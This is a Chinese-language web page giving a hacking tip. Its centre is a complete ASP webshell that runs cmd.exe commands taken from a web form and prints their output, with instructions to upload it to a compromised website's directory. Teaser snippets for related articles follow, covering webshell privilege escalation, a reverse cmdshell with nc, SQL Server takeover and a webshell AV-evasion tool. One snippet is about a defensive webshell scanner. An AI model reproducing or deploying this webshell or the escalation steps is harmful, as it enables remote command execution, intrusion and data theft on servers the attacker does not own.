时间:2021-05-23
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
复制代码代码如下:
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='执行'></form>")
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行。
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
前些日子搞一个站..拿到了WEBSHELL可就是提权不了...分析了下也只有通过autorun.inf提权但是貌似时间不能等了..目标是拿到完整数据库文件..可
webshell提权小技巧cmd路径:c:\windows\temp\cmd.exenc也在同目录下例如反弹cmdshell:"c:\windows\temp\
一旦被黑客获取到webshell,黑客就知道了你的sqlserver管理员密码,如果sqlserver再没有经过安全设置那么黑客很容易就提权并新建系统管理员账号
lostwolf写的这不是webshell,只是个webshell免杀工具切勿当初webshell使用仅限免杀phpwebshell该工具运行在cli模式!如果
本文实例讲述了PHP实现webshell扫描文件木马的方法。分享给大家供大家参考,具体如下:可扫描weevelyshell生成或加密的shell及各种变异web